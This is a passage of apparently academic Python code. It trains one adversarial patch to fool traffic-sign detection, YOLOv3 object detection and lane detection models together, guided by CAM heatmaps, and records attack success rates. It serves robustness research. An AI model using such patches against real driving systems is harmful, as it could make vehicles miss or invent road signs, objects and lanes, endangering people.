= np.array(Image.open(img_path))\n h, w, _ = img.shape\n dim_diff = np.abs(h - w) \n pad1, pad2 = dim_diff // 2, dim_diff - dim_diff // 2\n pad = ((pad1, pad2), (0, 0), (0, 0)) if h <= w else ((0, 0), (pad1, pad2), (0, 0)) \n # 高度小于宽度时,按行左右填充;否则按列上下填充\n \n # 计算图像对应位置\n rect_xxyy=[0,0,416,416] # kuan_start,gao_start,kuan_end,gao_end\n \n if h<=w:\n rect_xxyy[1]=int(pad1/w * 416)\n rect_xxyy[3]=int((pad1+h)/w * 416)\n else:\n rect_xxyy[0]=int(pad1/h * 416)\n rect_xxyy[2]=int((pad2+w)/h * 416)\n\n img_hidden = np.pad(img, pad, 'constant', constant_values=127.5) / 255. 
# 归一化了\n \n print(img_hidden.shape,rect_xxyy)\n \n img_hidden=resize(img_hidden, (416, 416, 3), mode='reflect') # 重新变化大小\n img_hidden = np.transpose(img_hidden, (2, 0, 1))\n img_hidden = torch.from_numpy(img_hidden).float()\n\n input_img = Variable(img_hidden.type(Tensor)).unsqueeze(0).to(device)\n return input_img,rect_xxyy\n\ndef parse_detections_OD(results,step):\n '''\n 就是使用model进行检测并且对结果进行处理,返回识别框列表和标签信息列表\n '''\n # 存储每一个bbox并返回用于绘制图像\n bboxinfo_list=[]\n labelinfo_list=[]\n label_string_list=\"\"\n if results[0] is not None:\n bbox_colors=colors\n for x1, y1, x2, y2, conf, cls_conf, cls_pred in results[0]:\n print ('\\t+ Label: %s, Conf: %.5f' % (classes_OD[int(cls_pred)], cls_conf.item()))\n label_string_list+=\"\\t+ Label:\"+ classes_OD[int(cls_pred)] +\", Conf:\"+str(cls_conf.item())+\"
    \"\n # color = bbox_colors[int(np.where(unique_labels == int(cls_pred))[0])]\n color = bbox_colors[int(cls_pred)]\n # store bbox\n bboxinfo_list.append([x1, y1, x2, y2, conf, cls_conf, cls_pred])#,unpad_h,unpad_w,pad_x,pad_y])\n # store labelinfo\n labelinfo_list.append(color)\n # tb_writer.log({\n # 'Labellist':wandb.Html(label_string_list)\n # },step=step)\n return bboxinfo_list,labelinfo_list\n\ndef draw_detections_OD(bboxinfo_list, labelinfo_list,img):\n '''\n draw detected boxes\n '''\n plt.figure()\n fig, ax2 = plt.subplots(1)\n # 图片分辨率 = figsize*dpi 代码为416*416\n plt.rcParams['figure.figsize'] = (8.32, 8.32) \n plt.rcParams['savefig.dpi'] = 50 \n \n ax2.imshow(img)\n \n for i in range(len(labelinfo_list)):\n [x1, y1, x2, y2, conf, cls_conf, cls_pred]=bboxinfo_list[i]\n color=labelinfo_list[i]\n x1=int(x1)\n y1=int(y1)\n x2=int(x2)\n y2=int(y2)\n # Rescale coordinates to original dimensions\n box_h = int(((y2 - y1)))\n box_w = int(((x2 - x1)))\n # Create a Rectangle patch\n bbox = patches.Rectangle((x1, y1), box_w, box_h, linewidth=2,\n edgecolor=color,\n facecolor='none')\n # print(\"bbox type: \",type(bbox))\n ax2.add_patch(bbox)\n plt.text(x1, y1-10, s=classes_OD[int(cls_pred)]+' '+ str('%.4f'%cls_conf.item()), color='white', verticalalignment='top',\n bbox={'color': color, 'pad': 0})\n \n plt.axis('off')\n plt.margins(0,0)\n plt.subplots_adjust(top=1,bottom=0,left=0,right=1,hspace=0,wspace=0)\n plt.gca().xaxis.set_major_locator(NullLocator())\n plt.gca().yaxis.set_major_locator(NullLocator())\n buffer = BytesIO()\n plt.savefig(buffer, format='png')\n new_img = np.asarray(Image.open(buffer))\n plt.close()\n return new_img\n\ndef renormalize_cam_with_bounding_OD(boxinfo_list, image_float_np, grayscale_cam, labelinfo_list=None):\n \"\"\"\n Normalize the CAM to be in the range [0, 1] \n inside every bounding boxes, and zero outside of the bounding boxes. 
\n 当用来规范整图的cam时,需要注意boxinfo_list=[[x_start,y_start,x_end,y_end]]\n \"\"\"\n if len(boxinfo_list) !=0:\n renormalized_cam = np.zeros(grayscale_cam.shape, dtype=np.float32)\n # print(renormalized_cam.shape)\n for i in range(len(boxinfo_list)):\n x1=int(boxinfo_list[i][0])\n if x1<0:\n x1=0\n elif x1>415:\n x1=415\n y1=int(boxinfo_list[i][1])\n if y1<0:\n y1=0\n elif y1>415:\n y1=415\n x2=int(boxinfo_list[i][2])\n if x2<0:\n x2=0\n elif x2>415:\n x2=415\n y2=int(boxinfo_list[i][3])\n if y2<0:\n y2=0\n elif y2>415:\n y2=415\n\n renormalized_cam[y1:y2, x1:x2] = scale_cam_image(grayscale_cam[y1:y2, x1:x2].copy()) \n renormalized_cam = scale_cam_image(renormalized_cam)\n eigencam_image_renormalized = show_cam_on_image(image_float_np, renormalized_cam, use_rgb=True)\n if labelinfo_list is not None:\n # 如果是需要画图的检测框内热力图绘制框,那么把框画上\n image_with_bounding_boxes = draw_detections_OD(boxinfo_list, labelinfo_list, eigencam_image_renormalized)\n else:\n # 如果只是对整体图片进行热力图切块,那么直接传回就好\n return eigencam_image_renormalized\n else:\n image_with_bounding_boxes=image_float_np\n return image_with_bounding_boxes\n\ndef visualization_OD(grayscale_cam_visual,img_visual,model,tensor,rect_xxyy,step):\n '''\n Detect the img and show with cam\n 输入grayscale_cam_visual,img_visual,rect_xxyy,img_raw都是np矩阵\n '''\n \n # visualization 传入的rect_xxyy是一层的数组[],但是renormalize_cam_with_bounding需要两层的输入[[]],此时传回的是np矩阵\n cam_image=renormalize_cam_with_bounding_OD([rect_xxyy], img_visual, grayscale_cam_visual)\n \n with torch.no_grad():\n results = model(tensor)\n results = non_max_suppression_OD(results, 8, opt.conf_thres, opt.nms_thres)\n \n # 通过parse_detections从results中获取绘图信息\n bboxinfo_list,labelinfo_list= parse_detections_OD(results,step)\n \n # 传递到draw中进行绘制,并返回图像\n heatmap_detect=draw_detections_OD(bboxinfo_list,labelinfo_list, cam_image.copy())\n\n return bboxinfo_list,labelinfo_list,heatmap_detect\n\n# -------------以下是RL使用的函数\n\ndef Draw(seg_pred,exist_pred,img,num,step,suffix):\n # 统计\n n_line=0\n \n # 绘图\n img = cv2.cvtColor(img, cv2.COLOR_RGB2BGR)\n line_img = np.zeros_like(img)\n line_img_list=[]\n img_i=line_img.copy()\n color = np.array([[255, 125, 0], [0, 255, 0], [0, 125, 255], [0, 255, 255]], dtype='uint8')\n coord_mask = np.argmax(seg_pred, axis=0)\n # line_img[coord_mask == (0 + 1)] = color[0]\n for i in range(0, 4):\n if exist_pred[0, i] > 0.5:\n # print(\"exit_pred 第\",i,\"个满足阈值\")\n line_img[coord_mask == (i + 1)] = color[i]\n img_fori=img_i.copy()\n img_fori[coord_mask == (i + 1)] = color[i]\n line_img_list.append(img_fori)\n n_line+=1\n \n img_show = cv2.addWeighted(src1=line_img, alpha=0.8, src2=img, beta=1., gamma=0.)\n \n return n_line,line_img_list,line_img,img_show\n\ndef DGF_detect(n_x,n_i,line_x_list,line_i_list):\n color = np.array([[255, 125, 0], [0, 255, 0], [0, 125, 255], [0, 255, 255]], dtype='uint8')\n Disappear,Generate,False_detect=0,0,0\n print(\"n_x: \",n_x,\"n_i: \",n_i)\n diff_list_minus=[]\n diff_list_posit=[]\n for i in range(n_i):\n diff=(line_i_list[i][:,:,1]/line_i_list[i][:,:,1].max()-line_x_list[i][:,:,1]/line_x_list[i][:,:,1].max())\n diff_list_minus.append(sum(sum(np.minimum(diff,0))))\n diff_list_posit.append(sum(sum(np.maximum(diff,0))))\n if sum(sum((line_i_list[i][:,:,1]/line_i_list[i][:,:,1].max())))==0:\n Disappear=1\n for i in range(len(diff_list_minus)):\n if diff_list_posit[i]>200:\n Generate=1\n elif diff_list_minus[i]<-200:\n Disappear=1\n elif diff_list_posit[i]>100:\n False_detect=1\n return Disappear,Generate,False_detect\n\ndef Get_CAM_ALL(x,gradCamTensor):\n with 
torch.no_grad(): \n output = model_RL(x)\n \n output=output.cpu().numpy()\n coord_mask = np.argmax(output[0], axis=0) \n K=output.shape[1]\n\n # cam_img_hidden=img\n grayscale_cam_all=torch.zeros([288,512]).to(device)\n for k in range(1,K):\n mask_float = np.float32(coord_mask == k)\n targets = [SemanticSegmentationTarget(k, mask_float)] \n grayscale_cam = gradCamTensor(input_tensor=x,targets=targets)[0][0]\n grayscale_cam_all=torch.add(grayscale_cam_all,grayscale_cam)\n\n # # 统一cam并显示\n grayscale_cam_all=grayscale_cam_all/grayscale_cam_all.max()\n return grayscale_cam_all\n\ndef Run_ODTSRL():\n # cam设置\n target_layers_TS = [model_TS.module_list[-2]]\n cam_TS = RemainTensor(model_TS, target_layers_TS, use_cuda=True)\n target_layers_OD = [model_OD.module_list[-2]]\n cam_OD = RemainTensor(model_OD, target_layers_OD, use_cuda=True)\n target_layers = [model_RL.model.layer2[1]] #message_passing层不能加hook!\n gradCamTensor = GradCAMTensor(model=model_RL,target_layers=target_layers,use_cuda=torch.cuda.is_available())\n \n # 统计参量\n MissingASR_TS,MisdetectASR_TS,GenerationASR_TS,TotalASR_TS=0,0,0,0\n MissingASR_OD,MisdetectASR_OD,GenerationASR_OD,TotalASR_OD=0,0,0,0\n MissingASR_RL,MisdetectASR_RL,GenerationASR_RL,TotalASR_RL=0,0,0,0\n\n MisMisMis_ASR,MdtMdtMdt_ASR,GenGenGen_ASR,AttAASR,TotalASR=0,0,0,0,0\n \n \n # 同时对应的数据\n opt.image_folder_RL = crop_dirs_RL\n opt.image_folder_TS = crop_dirs_TS\n opt.image_folder_OD = crop_dirs_OD\n names_TS = os.listdir(opt.image_folder_TS)\n names_RL = os.listdir(opt.image_folder_RL)\n names_OD = os.listdir(opt.image_folder_OD)\n N=min(len(names_TS),len(names_OD),len(names_RL))\n print(\"N == \",N)\n for i in tqdm(range(N)):\n # 统计变量\n isMissing_TS, isMisdetection_TS, isGeneration_TS = 0, 0, 0\n isMissing_OD, isMisdetection_OD, isGeneration_OD = 0, 0, 0\n isMissing_RL, isMisdetection_RL, isGeneration_RL = 0, 0, 0\n\n mismismis,mdtmdtmdt,gengengen,attaodtsrl=0,0,0,0\n\n loss_TS_list=[]\n loss_OD_list=[]\n loss_RL_list=[]\n loss_all_list=[]\n \n # 加载图像路径\n img_path_OD = os.path.join(opt.image_folder_OD, names_OD[i])\n img_path_TS = os.path.join(opt.image_folder_TS, names_TS[i])\n img_path_RL = os.path.join(opt.image_folder_RL, names_RL[i])\n\n # 加载OD图像\n input_img_OD,rect_xxyy_OD=load_img_OD(img_path_OD)\n # 加载TS图像\n input_img_TS = torchvision.transforms.ToTensor()(Image.open(img_path_TS).convert(mode=\"RGB\"))\n input_img_TS, pads = pad_to_square(input_img_TS, 0) #显存增加100M\n show_img_size_TS=input_img_TS.shape[1]\n # 加载RL图像\n img_RL = cv2.imread(img_path_RL)\n img_RL = cv2.cvtColor(img_RL, cv2.COLOR_BGR2RGB)\n img_RL = transform_img({'img': img_RL})['img']\n x_RL = transform_to_net({'img': img_RL})['img']\n x_RL.unsqueeze_(0)\n x_RL=x_RL.to(device)\n\n\n # 进行无patch的检测与显示-----------------------------------------------------------------------------TS \n img_show_TS = Variable(input_img_TS.type(Tensor)).to(device)\n input_img_TS = resize_TS(input_img_TS, opt.img_size_TS).unsqueeze(0) # 重新变化图片大小和格式变化\n input_img_TS = Variable(input_img_TS.type(Tensor)).to(device)\n \n # 生成原始的cam\n with torch.no_grad():\n grayscale_cam_TS = cam_TS(input_img_TS)[0]\n\n # visualization the img without patch\n grayscale_cam_TS_numpy = grayscale_cam_TS.cpu().detach().numpy() # to_numpy, easy visualization\n grayscale_cam_show_TS=cv2.resize(grayscale_cam_TS_numpy, dsize=(show_img_size_TS, show_img_size_TS), interpolation=cv2.INTER_LINEAR)\n \n # 用于展示的原始图片numpy格式\n img_show_TS = img_show_TS.cpu().detach().numpy()\n img_show_TS = np.transpose(img_show_TS,(1,2,0)) #img_visual是np数据类型\n \n # 
将cam放在img上\n cam_image_TS = show_cam_on_image(img_show_TS, grayscale_cam_show_TS, use_rgb=True)\n \n with torch.no_grad():\n detections_TS = model_TS(input_img_TS)\n detections_TS = non_max_suppression_TS(detections_TS, opt.conf_thres, opt.nms_thres)[0] \n print(\"---- TS step 0 ----\")\n if detections_TS is not None:\n detections_TS = rescale_boxes_TS(detections_TS, opt.img_size_TS, [show_img_size_TS,show_img_size_TS])\n # 画图在cam贴图上\n img_show = Image.fromarray(cam_image_TS)\n # 用于分类的图片\n img_class = input_img_TS.clone()\n img_class = img_class.squeeze(0).cpu().detach().numpy()\n img_class = np.transpose(img_class,(1,2,0))\n img_class = cv2.resize(img_class, dsize=(show_img_size_TS, show_img_size_TS), interpolation=cv2.INTER_LINEAR)\n img_class = img_class*255\n img_class = Image.fromarray(img_class.astype(np.uint8)) # 用于分类的图片\n obj_0,img_down_0 = classify_draw_TS(opt.image_folder_TS,img_show,img_class,detections_TS,i,1)\n print(\"obj_0: \",obj_0)\n \n else:\n print(\"这个图片没能检测出来目标\")\n continue\n\n # 进行无patch的检测与显示-----------------------------------------------------------------------------OD\n grayscale_cam_OD = cam_OD(input_img_OD)[0]\n # grayscale_cam_OD = 1/(1+torch.exp(-15*(grayscale_cam_OD-0.4))) # soft masking\n\n # visualization the img without patch\n grayscale_cam_show_OD = grayscale_cam_OD.cpu().detach().numpy() # to_numpy, easy visualization\n img_show_OD = input_img_OD.squeeze(0).cpu().detach().numpy()\n img_show_OD = np.transpose(img_show_OD,(1,2,0))\n print(\"---- OD step 0 ----\")\n boxinfo_list0,colorinfo_list0,heatmap_detect_OD=visualization_OD(grayscale_cam_show_OD,img_show_OD,model_OD,input_img_OD,rect_xxyy_OD,0)\n \n \n if len(colorinfo_list0)==0:\n continue\n \n # 进行无patch的检测与显示--------------------------------------------RL \n seg_pred, exist_pred = net(x_RL)[:2]\n seg_pred = seg_pred.detach().cpu().numpy()[0]\n exist_pred = exist_pred.detach().cpu().numpy()\n n_x,line_x_list,line_img_x,img_x_show=Draw(seg_pred,exist_pred,img_RL,i,0,\"NoCam\")\n \n line_img=cv2.cvtColor(line_img_x, cv2.COLOR_RGB2BGR)\n\n # ------------- 获得CAM--------------\n grayscale_cam_all=Get_CAM_ALL(x_RL,gradCamTensor)\n cam_image = show_cam_on_image(np.array(img_RL)/255, grayscale_cam_all.detach().cpu().numpy(), use_rgb=True)\n _,_,_,img_cam_x=Draw(seg_pred,exist_pred,cam_image,i,0,\"WithCam\")\n \n \n # 创建目标热力图----------------------------------------------------------------------------------------TSOD\n orient_cam_TS=grayscale_cam_TS.clone()\n orient_cam_TS[:,:]=torch.zeros(opt.img_size_TS,opt.img_size_TS)\n orient_cam_TS[opt.patch_pos_TS[0]:opt.patch_pos_TS[0]+opt.patch_size[1],opt.patch_pos_TS[1]:opt.patch_pos_TS[1]+opt.patch_size[0]]=torch.ones(opt.patch_size[1],opt.patch_size[0])\n\n orient_cam_OD=grayscale_cam_OD.clone()\n orient_cam_OD[:,:]=torch.zeros(opt.img_size_OD,opt.img_size_OD)\n orient_cam_OD[opt.patch_pos_OD[0]:opt.patch_pos_OD[0]+opt.patch_size[1],opt.patch_pos_OD[1]:opt.patch_pos_OD[1]+opt.patch_size[0]]=torch.ones(opt.patch_size[1],opt.patch_size[0])\n orient_cam_OD=orient_cam_OD[rect_xxyy_OD[1]:rect_xxyy_OD[3],rect_xxyy_OD[0]:rect_xxyy_OD[2]]\n \n cam_orient_tensor=grayscale_cam_all.clone()\n cam_orient_tensor[:,:]=torch.zeros(resize_shape[1],resize_shape[0])\n cam_orient_tensor[opt.patch_pos_RL[0]:opt.patch_pos_RL[0]+opt.patch_size[1],opt.patch_pos_RL[1]:opt.patch_pos_RL[1]+opt.patch_size[0]]=torch.ones(opt.patch_size[1],opt.patch_size[0])\n \n # ---------------------Patch创建---------\n # 新建patch贴图并初始化迭代参数\n patch = torch.rand(3,opt.patch_size[1],opt.patch_size[0])\n 
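# the adversarial patch starts as uniform random RGB noise in [0, 1); MyOptimizer clips each update back into that range\n        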
patch.requires_grad_(True) # upgrade able\n lr = opt.lr\n optimizer = MyOptimizer([patch], lr=lr)\n scheduler = ReduceLROnPlateau(optimizer, mode='min', factor=0.1, patience=40)\n \n for step in range(1,opt.epochs+1):\n print(f\"step {step} running!!\")\n \n # --------------------------------------在TS下训练并求得loss_TS------------------------------------------\n inputi_TS=input_img_TS.clone()\n ismiss,ismisdetect,isgeneration=0,0,0\n # print(\"加载的inputi大小: \",inputi_TS.shape)\n # attach he patch to the img\n inputi_TS[:,:,opt.patch_pos_TS[0]:opt.patch_pos_TS[0]+opt.patch_size[1],opt.patch_pos_TS[1]:opt.patch_pos_TS[1]+opt.patch_size[0]]=patch\n grayscale_cami_TS = cam_TS(inputi_TS)[0] #似乎只在第一次调用时(子循环内)显存增加2G\n \n # visualization the img with patch\n grayscale_cam_TS_numpyi = grayscale_cami_TS.cpu().detach().numpy() # to_numpy, easy visualization\n grayscale_cam_showi_TS = cv2.resize(grayscale_cam_TS_numpyi, dsize=(show_img_size_TS, show_img_size_TS), interpolation=cv2.INTER_LINEAR)\n inputi_numpy_TS = inputi_TS.squeeze(0).cpu().detach().numpy()\n inputi_numpy_TS = np.transpose(inputi_numpy_TS,(1,2,0))\n inputi_numpy_TS = cv2.resize(inputi_numpy_TS, dsize=(show_img_size_TS, show_img_size_TS), interpolation=cv2.INTER_LINEAR)\n \n # 将cam放在img上\n cam_img_TS_i = show_cam_on_image(inputi_numpy_TS, grayscale_cam_showi_TS, use_rgb=True)\n \n # 进行检测\n with torch.no_grad():\n detections_TS_i = model_TS(inputi_TS)\n detections_TS_i = non_max_suppression_TS(detections_TS_i, opt.conf_thres, opt.nms_thres)[0]\n\n if detections_TS_i is not None:\n detections_TS_i = rescale_boxes_TS(detections_TS_i, opt.img_size_TS, [show_img_size_TS,show_img_size_TS])\n\n # 画图在cam贴图上\n img_show_TS_i = Image.fromarray(cam_img_TS_i)\n inputi_numpy_TS = inputi_numpy_TS*255\n inputi_numpy_TS = Image.fromarray(inputi_numpy_TS.astype(np.uint8)) # 用于分类的图片\n \n # print(\"cam图加载的格式: \",img_show.size)\n obj_i,img_down_i = classify_draw_TS(opt.image_folder_TS,img_show_TS_i,inputi_numpy_TS,detections_TS_i,i,step)\n print(obj_i)\n # print(\"检测返回列表\",obj_i)\n ismiss_TS,ismisdetect_TS,isgeneration_TS=Miss_Generation_Misdetect_TS(obj_0,obj_i)\n print(\"ismiss: \",bool(ismiss_TS),\"\\n ismisdetect: \",bool(ismisdetect_TS),\"\\n isgeneration: \",bool(isgeneration_TS))\n else:\n ismiss_TS=1\n\n # 统计\n if isMissing_TS==0 and ismiss_TS==1: # 之前没有检测到,现在检测到丢失\n isMissing_TS=1\n MissingASR_TS+=1\n\n if isGeneration_TS==0 and isgeneration_TS==1:\n isGeneration_TS=1\n GenerationASR_TS+=1\n\n if isMisdetection_TS==0 and ismisdetect_TS==1:\n isMisdetection_TS=1\n MisdetectASR_TS+=1\n\n # 计算Loss_TS\n loss_TS=compute_loss(grayscale_cami_TS,orient_cam_TS.detach(),2)\n\n \n # --------------------------------------在OD下训练并求得loss_OD------------------------------------------\n print(f\"step {step} running!!\")\n inputi_OD=input_img_OD.clone()\n\n # attach he patch to the img\n inputi_OD[:,:,opt.patch_pos_OD[0]:opt.patch_pos_OD[0]+opt.patch_size[1],opt.patch_pos_OD[1]:opt.patch_pos_OD[1]+opt.patch_size[0]]=patch # need to verify if only patch is updated!! 
input's requires_grad is True\n grayscale_cam_OD = cam_OD(inputi_OD)[0] # adapt to nparray, need to prevent transformation from tensor to nparray in source code\n # grayscale_cam_OD = 1/(1+torch.exp(-20*(grayscale_cam_OD-0.4))) # soft masking\n\n # visualization\n grayscale_cam_visual = grayscale_cam_OD.cpu().detach().numpy()\n img_visual = inputi_OD.squeeze(0).cpu().detach().numpy()\n img_visual = np.transpose(img_visual,(1,2,0))\n boxinfo_list,labelinfo_list,heatmap_detect=visualization_OD(grayscale_cam_visual,img_visual,model_OD,inputi_OD,rect_xxyy_OD,step)\n\n ismiss_OD,ismisclass_OD,isgeneration_OD=IsMisMisGen_OD(boxinfo_list0,len(colorinfo_list0),boxinfo_list,len(labelinfo_list))\n print(\"丢失:\",bool(ismiss_OD),\"\\n\",\" 误判:\",bool(ismisclass_OD),\"\\n\",\" 新产生:\",bool(isgeneration_OD),\"\\n\")\n\n \n if isMissing_OD==0 and ismiss_OD==1: # 之前没有检测到,现在检测到丢失\n isMissing_OD=1\n MissingASR_OD+=1\n\n if isMisdetection_OD==0 and ismisclass_OD==1:\n isMisdetection_OD=1\n MisdetectASR_OD+=1\n\n if isGeneration_OD==0 and isgeneration_OD==1:\n isGeneration_OD=1\n GenerationASR_OD+=1\n\n cam_now_OD=grayscale_cam_OD[rect_xxyy_OD[1]:rect_xxyy_OD[3],rect_xxyy_OD[0]:rect_xxyy_OD[2]]\n loss_OD = compute_loss(cam_now_OD,orient_cam_OD.detach(),2)\n\n \n # --------------------------------------在RL下训练并求得loss_RL------------------------------------------\n imgi=img_RL.copy()\n # attach he patch to the img\n print(imgi.shape)\n \n xi = transform_to_net({'img':imgi})['img']\n xi.unsqueeze_(0)\n xi[:,:,opt.patch_pos_RL[0]:opt.patch_pos_RL[0]+opt.patch_size[1],opt.patch_pos_RL[1]:opt.patch_pos_RL[1]+opt.patch_size[0]]=patch*255\n xi=xi.to(device)\n\n imgi[opt.patch_pos_RL[0]:opt.patch_pos_RL[0]+opt.patch_size[1],opt.patch_pos_RL[1]:opt.patch_pos_RL[1]+opt.patch_size[0],:]=np.transpose(patch.detach().cpu().numpy(),(1,2,0))*255\n print(imgi.shape)\n # ---------------------------------------------- 检测\n seg_predi, exist_predi = net(xi)[:2]\n seg_predi = seg_predi.detach().cpu().numpy()[0]\n exist_predi = exist_predi.detach().cpu().numpy()\n n_i,line_xi_list,line_img_i,img_xi=Draw(seg_predi,exist_predi,imgi,i,step,\"NoCam\")\n\n disappeari,generatei,false_detecti=DGF_detect(n_x,n_i,line_x_list,line_xi_list)\n print(\"Disappear_RL: \",bool(disappeari),\"\\ngenerate: \",bool(generatei),\"\\nfalse_detect: \",bool(false_detecti))\n # ---------------------------------------------- 获取新CAM\n grayscale_cam_alli=Get_CAM_ALL(xi,gradCamTensor) # 返回的是numpy值\n \n cam_imagei = show_cam_on_image(np.array(imgi)/255, grayscale_cam_alli.detach().cpu().numpy(), use_rgb=True)\n \n _,_,_,img_cam_xi=Draw(seg_predi,exist_predi,cam_imagei,i,step,\"WithCam\")\n\n if isMissing_RL==0 and disappeari==1:\n isMissing_RL=1\n MissingASR_RL+=1\n\n if isGeneration_RL==0 and generatei==1:\n isGeneration_RL=1\n GenerationASR_RL+=1\n\n if isMisdetection_RL==0 and false_detecti==1:\n isMisdetection_RL=1\n MisdetectASR_RL+=1\n\n \n if isMissing_RL==1 and isGeneration_RL==1 and isMisdetection_RL==1:\n break\n loss_RL=compute_loss(grayscale_cam_alli,cam_orient_tensor.detach(),3)\n\n\n if (ismiss_OD or ismisclass_OD or isgeneration_OD):\n OD_attack=1\n else:\n OD_attack=0\n if (ismiss_TS or ismisdetect_TS or isgeneration_TS):\n TS_attack=1\n else:\n TS_attack=0\n if (disappeari or generatei or false_detecti):\n RL_attack=1\n else:\n RL_attack=0\n \n if TS_attack==1 and OD_attack==1 and RL_attack==1 and attaodtsrl==0:\n attaodtsrl=1\n AttAASR+=1\n\n if ismiss_OD and disappeari and ismiss_TS and mismismis==0:\n mismismis=1\n MisMisMis_ASR+=1\n if 
ismisclass_OD and ismisdetect_TS and false_detecti and mdtmdtmdt==0:\n mdtmdtmdt=1\n MdtMdtMdt_ASR+=1\n if isgeneration_OD and isgeneration_TS and generatei and gengengen==0:\n gengengen=1\n GenGenGen_ASR+=1\n\n if isMissing_RL and isMisdetection_RL and isGeneration_RL and isMissing_OD and isMisdetection_OD and isGeneration_OD and isMissing_TS and isMisdetection_TS and isGeneration_TS:\n print(\"所有攻击均实现,当前step为: \",step)\n break\n \n # -------------------------------------------计算总loss并回传----------------------------\n print(\"Loss_OD is : \",loss_OD.item())\n print(\"Loss_TS is : \",loss_TS.item())\n print(\"Loss_RL is : \",loss_RL.item())\n \n \n loss=loss_TS+loss_OD*2/3+loss_RL/60\n loss_all_list.append(loss.item())\n print(\"loss_All:\",loss.item())\n \n loss.backward() # loss 1 in AoA\n \n optimizer.step()\n scheduler.step(loss)\n\n optimizer.zero_grad()\n \n if isMissing_OD or isMisdetection_OD or isGeneration_OD:\n TotalASR_OD+=1\n if isMissing_TS or isMisdetection_TS or isGeneration_TS:\n TotalASR_TS+=1\n if isMissing_RL or isGeneration_RL or isMisdetection_RL:\n TotalASR_RL+=1\n \n if (isMissing_OD and isMissing_TS and isMissing_RL)or (isMisdetection_OD and isMisdetection_TS and isMisdetection_RL ) or (isGeneration_OD and isGeneration_TS and isGeneration_RL):\n TotalASR+=1\n \n\n MissingASR_TS/=N\n MisdetectASR_TS/=N\n GenerationASR_TS/=N\n TotalASR_TS/=N\n MissingASR_OD/=N\n MisdetectASR_OD/=N\n GenerationASR_OD/=N\n TotalASR_OD/=N\n MissingASR_RL/=N\n MisdetectASR_RL/=N\n GenerationASR_RL/=N\n TotalASR_RL/=N\n \n MisMisMis_ASR/=N\n MdtMdtMdt_ASR/=N\n GenGenGen_ASR/=N\n AttAASR/=N\n TotalASR/=N\n\n \n file_note = open(\"MultiTaskTrain/ASR_odtsrl.txt\", 'w')\n file_note.write(\"各种攻击ASR\"+\n \"\\nMissingASR_TS: \"+str(MissingASR_TS)+\n \"\\nMisdetectASR_TS: \"+str(MisdetectASR_TS)+\n \"\\nGenerationASR_TS: \"+str(GenerationASR_TS)+\n \"\\nTotalASR_TS: \"+str(TotalASR_TS)+\n \"\\n\"+\n \"\\nMissingASR_OD: \"+str(MissingASR_OD)+\n \"\\nMisdetectASR_OD: \"+str(MisdetectASR_OD)+\n \"\\nGenerationASR_OD: \"+str(GenerationASR_OD)+\n \"\\nTotalASR_OD: \"+str(TotalASR_OD)+\n \"\\n\"+\n \"\\nMissingASR_RL: \"+str(MissingASR_RL)+\n \"\\nMisdetectASR_RL: \"+str(MisdetectASR_RL)+\n \"\\nGenerationASR_RL: \"+str(GenerationASR_RL)+\n \"\\nTotalASR_RL: \"+str(TotalASR_RL)+\n \"\\n\"+\n \"\\nMisMisMis: \"+str(MisMisMis_ASR)+\n \"\\nMdtMdtMdt_ASR: \"+str(MdtMdtMdt_ASR)+\n \"\\nGenGenGen_ASR: \"+str(GenGenGen_ASR)+\n \"\\nAttAASR: \"+str(AttAASR)+\n \"\\nTotalASR: \"+str(TotalASR)\n )\n file_note.close()\n\nif __name__ == \"__main__\":\n\n # TS 模型参数\n sign_classes = 115\n classes_weights_path_TS = \"MultiTaskTrain/ALL_sign_data/checkpoints/model_acc_97__class_115_epoch_10.pt\"\n \n # OD 模型参数\n kitti_weights = 'MultiTaskTrain/weights_OD/yolov3-kitti.weights'\n \n parser = argparse.ArgumentParser()\n parser.add_argument(\"--image_folder_TS\", type=str, default=\"MultiTaskTrain/demo/TSD\", help=\"path to dataset\")\n parser.add_argument(\"--model_def_TS\", type=str, default=\"MultiTaskTrain/config_TS/ALL_DATA.cfg\", help=\"path to model definition file\")\n parser.add_argument(\"--weights_path_TS\", type=str, default=\"MultiTaskTrain/checkpointsTS/yolov3_ckpt_33.pth\", help=\"path to weights file\")\n parser.add_argument(\"--class_path_TS\", type=str, default=\"MultiTaskTrain/ALL_sign_data/ALL_data_in_2_train/names.txt\", help=\"path to class label file\")\n\n parser.add_argument('--image_folder_OD', type=str, default='MultiTaskTrain/demo/OD', help='path to dataset')\n 
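# the OD arguments below mirror the TS block above: model config, weights and class-name files\n    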
parser.add_argument('--config_path_OD', type=str, default='MultiTaskTrain/config_OD/yolov3-kitti.cfg', help='path to model config file')\n parser.add_argument('--weights_path_OD', type=str, default=kitti_weights, help='path to weights file')\n parser.add_argument('--class_path_OD', type=str, default='MultiTaskTrain/data_OD/kitti.names', help='path to class label file')\n \n parser.add_argument(\"--image_path_RL\", type=str, default=\"MultiTaskTrain/demo/RL/96.jpg\", help=\"Path to demo img\")\n parser.add_argument(\"--image_folder_RL\", type=str, default=\"MultiTaskTrain/demo/RL\", help=\"Path to demo img\")\n parser.add_argument(\"--weight_path_RL\", type=str, default=\"MultiTaskTrain/weight_RL/exp0/exp0_best.pth\",help=\"Path to model weights\")\n \n parser.add_argument(\"--conf_thres\", type=float, default=0.8, help=\"object confidence threshold\")\n parser.add_argument(\"--nms_thres\", type=float, default=0.4, help=\"iou thresshold for non-maximum suppression\")\n parser.add_argument(\"--batch_size\", type=int, default=1, help=\"size of the batches\")\n parser.add_argument(\"--n_cpu\", type=int, default=1, help=\"number of cpu threads to use during batch generation\")\n \n parser.add_argument(\"--img_size_TS\", type=int, default=512, help=\"size of each image dimension\")\n parser.add_argument('--img_size_OD', type=int, default=416, help='size of each image dimension')\n \n # 其他训练参数\n parser.add_argument('--epochs', type=int, default=100)\n parser.add_argument('--lr', type=float, default=100, help='learning rate')\n parser.add_argument('--patch_size', nargs='+', type=int, default=[40,40], help='[min_train, max-train, test]')# [y,x]\n parser.add_argument('--patch_pos_TS', nargs='+', type=int, default=[270,100], help='[min_train, max-train, test]') \n parser.add_argument('--patch_pos_OD', nargs='+', type=int, default=[270,100], help='[min_train, max-train, test]') \n parser.add_argument('--patch_pos_RL', nargs='+', type=int, default=[200,215], help='[min_train, max-train, test]') \n\n opt = parser.parse_args()\n\n print(opt) \n device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n Tensor = torch.cuda.FloatTensor if torch.cuda.is_available() else torch.FloatTensor\n\n # Set up TS model\n model_TS = Darknet_TS(opt.model_def_TS, img_size=opt.img_size_TS).to(device)\n\n model_TS.load_state_dict(torch.load(opt.weights_path_TS))\n\n classes_TS = 